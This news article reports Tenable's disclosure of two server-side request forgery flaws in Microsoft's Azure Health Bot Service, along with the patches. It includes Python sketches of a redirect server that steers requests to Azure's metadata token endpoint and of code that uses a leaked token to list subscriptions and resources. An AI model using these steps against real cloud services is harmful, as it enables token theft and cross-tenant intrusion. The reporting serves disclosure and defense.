Severe vulnerabilities have been found in Microsoft's AI healthcare chatbot service, permitting access to user and customer information, according to Tenable researchers.
The level of access granted by the vulnerabilities in the Azure Health Bot Service, one of which is rated critical, means it is likely that lateral movement to other resources was possible.
Microsoft has applied mitigations for the discovered vulnerabilities, with no customer action required.
Microsoft AI Chatbot Exploited
The Azure Health Bot Service is a cloud platform that enables healthcare organizations to build and deploy AI-powered virtual assistants to reduce costs and improve efficiency.
While analyzing the service for security issues, Tenable researchers focused on a feature called 'Data Connections', which allows bots to interact with external data sources to retrieve information from other services the provider may be using, such as a portal for patient information.
This data connection feature is designed to allow the service's backend to make requests to third-party APIs.
While testing these connections to see if they could interact with endpoints internal to the service, the researchers found that issuing redirect responses enabled them to bypass mitigations, such as filtering, on those endpoints.
Two privilege escalation vulnerabilities were uncovered as part of this process.
Critical Privilege Escalation Vulnerability
The first vulnerability detailed by Tenable was a privilege escalation issue exploited via a server-side request forgery (SSRF), assigned CVE-2024-38109.
The researchers configured a data connection to specify an external host under their control, with the aim of reaching Azure's Instance Metadata Service (IMDS).
The researchers then configured this external host to respond to requests with a 301 redirect response destined for IMDS.
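Tenable's write-up describes this step in prose; as a rough illustration, the attacker-controlled host could be as simple as the following Python sketch. The IMDS token path follows Azure's public documentation for the managed-identity endpoint, while the listening port and the exact URL redirected to are assumptions, not details from the research.

```python
# Illustrative sketch (not Tenable's actual tooling): an attacker-controlled
# HTTP server that answers every request with a 301 redirect pointing at the
# Azure Instance Metadata Service managed-identity token endpoint.
from http.server import BaseHTTPRequestHandler, HTTPServer

# Azure IMDS token endpoint, scoped to the ARM API (per Azure's public docs).
IMDS_TOKEN_URL = (
    "http://169.254.169.254/metadata/identity/oauth2/token"
    "?api-version=2018-02-01&resource=https://management.azure.com/"
)

class RedirectHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Respond with a 301 so the data connection's backend follows the
        # redirect into the internal metadata service.
        self.send_response(301)
        self.send_header("Location", IMDS_TOKEN_URL)
        self.end_headers()

if __name__ == "__main__":
    # Port 8080 is arbitrary; any externally reachable port would do.
    HTTPServer(("0.0.0.0", 8080), RedirectHandler).serve_forever()
```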
After receiving a valid metadata response, the researchers were able to obtain an access token for management.azure.com. This token enabled them to list the subscriptions they had access to via a call to https://management.azure.com/subscriptions?api-version=2020-01-01, which provided them with a subscription ID internal to Microsoft.
Tenable researchers could then list the resources they had access to via https://management.azure.com/subscriptions/
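A minimal sketch of this enumeration, assuming a token leaked as described above: the subscriptions URL is taken from the article, while the resources path and its API version come from the public Azure Resource Manager REST documentation, since the article truncates that URL.

```python
# Sketch of the enumeration steps described above, using a hypothetical
# leaked ARM access token. The token value is an illustrative placeholder.
import requests

ACCESS_TOKEN = "<token obtained via the IMDS redirect>"  # placeholder
HEADERS = {"Authorization": f"Bearer {ACCESS_TOKEN}"}

# List the subscriptions the token grants access to (URL from the article).
subs = requests.get(
    "https://management.azure.com/subscriptions?api-version=2020-01-01",
    headers=HEADERS,
).json()

for sub in subs.get("value", []):
    sub_id = sub["subscriptionId"]
    # List resources within each accessible subscription (path and
    # api-version per the public ARM REST docs, not the article).
    resources = requests.get(
        f"https://management.azure.com/subscriptions/{sub_id}/resources"
        "?api-version=2021-04-01",
        headers=HEADERS,
    ).json()
    print(sub_id, [r.get("id") for r in resources.get("value", [])])
```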
The findings were reported to Microsoft on June 17, 2024, and within a week, fixes were introduced into affected environments. By July 2, fixes had been rolled out across all regions.
The fix for this flaw involved rejecting redirect status codes altogether for data connection endpoints, which eliminated this attack vector.
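In client terms, that mitigation amounts to refusing to follow 3xx responses when fetching a data connection endpoint. A hypothetical Python illustration of the pattern, not Microsoft's actual implementation:

```python
# Illustrative mitigation: fetch a data connection endpoint without
# following redirects, and reject any 3xx status outright, so a redirect
# cannot steer the request toward an internal endpoint such as IMDS.
import requests

def fetch_data_connection(url: str) -> requests.Response:
    resp = requests.get(url, allow_redirects=False, timeout=10)
    if 300 <= resp.status_code < 400:
        raise ValueError(f"Redirect status {resp.status_code} rejected for {url}")
    return resp
```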
Microsoft has assigned this vulnerability a severity rating of Critical, confirming it could provide cross-tenant access. It has been included in Microsoft's August 2024 Patch Tuesday release.
There is no evidence that the issue was exploited by a malicious actor.
Important Privilege Escalation Vulnerability
After Microsoft fixed the first vulnerability, Tenable researchers found another privilege escalation vulnerability in the Data Connections feature of the Azure Health Bot Service.
The researchers used a similar server-side request forgery technique to exploit the flaw, found in the FHIR endpoint vector; FHIR prescribes a format for accessing electronic medical record resources and actions on those resources.
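For context, FHIR's REST conventions look like the following hypothetical read of a Patient resource. The base URL and resource ID are invented for illustration, and this is not the exploit itself, only the request format the endpoint type implements.

```python
# Minimal FHIR "read" interaction per the HL7 FHIR REST conventions:
# GET {base}/Patient/{id}, requesting the standard FHIR JSON media type.
import requests

FHIR_BASE = "https://example-fhir-server/fhir"  # illustrative endpoint

resp = requests.get(
    f"{FHIR_BASE}/Patient/123",
    headers={"Accept": "application/fhir+json"},
)
patient = resp.json()  # a FHIR Patient resource as JSON
```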
This vulnerability was less severe than the IMDS flaw, as it did not provide cross-tenant access.
The flaw was reported to Microsoft on July 9, with fixes made available by July 12. The vulnerability has been rated as Important.
There is no evidence that the issue was exploited by malicious actors.
Prioritizing Security in AI Models
The privilege escalation flaws relate to the underlying architecture of the AI chatbot service rather than the AI models themselves, the researchers noted.
Tenable said the discoveries highlight the continued importance of traditional web application and cloud security mechanisms for AI-powered services.
Read now: 70% of Businesses Prioritize Innovation Over Security in Generative AI Projects
In February 2024, Mozilla found that AI-powered "relationship" chatbots were deliberately ignoring privacy and security best practices.